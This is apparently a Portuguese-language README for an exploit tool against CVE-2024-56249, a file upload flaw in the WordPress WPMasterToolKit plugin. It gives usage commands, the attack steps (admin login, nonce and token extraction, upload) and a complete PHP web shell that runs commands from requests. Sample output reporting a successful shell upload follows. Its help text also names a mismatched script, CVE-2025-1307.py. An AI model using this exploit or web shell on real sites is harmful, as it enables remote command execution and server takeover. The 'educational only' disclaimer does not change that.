
Plugin WPMasterToolKit WordPress <= 1.13.1 - Vulnerabilidade de upload arbitrário de arquivos
Este script explora uma vulnerabilidade de Upload de Arquivo Arbitrário no plugin WPMasterToolKit do WordPress, permitindo que um atacante envie um web shell para o servidor. A vulnerabilidade existe nas versões <= 1.13.1 do plugin.
Para explorar esta vulnerabilidade, use o seguinte comando:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: URL do WordPress alvo (ex.: http://192.168.100.74:888/wordpress)-un / --username: nome de usuário administrador do WordPress-p / --password: senha do administrador do WordPress-fp / --filepath: caminho de upload do arquivo (padrão: wp-content/uploads/2025/03)-fn / --filename: nome do arquivo a enviar (padrão: shell.php)O script começa sondando a URL alvo para verificar se ela é vulnerável ao CVE-2024-56249, checando a versão do plugin WPMasterToolKit.
Em seguida, ele tenta fazer login no painel administrativo do WordPress usando as credenciais fornecidas.
Após o login bem-sucedido, o script extrai os tokens de segurança necessários (nonce e token) para o upload do arquivo.
Ele envia o arquivo especificado (ex.: um web shell) para o servidor alvo usando os tokens extraídos.
Por fim, o script verifica se o arquivo foi enviado com sucesso, checando sua acessibilidade através da URL alvo.
Certifique-se de que o arquivo shell (ex.: shell.php) esteja no mesmo diretório do script antes de executá-lo. Isso é necessário para que o script localize e envie o arquivo com sucesso.
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
Esta ferramenta destina-se apenas a fins educacionais. Use-a por sua conta e risco. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Script de exploit por Nxploit | Khaled Alenazi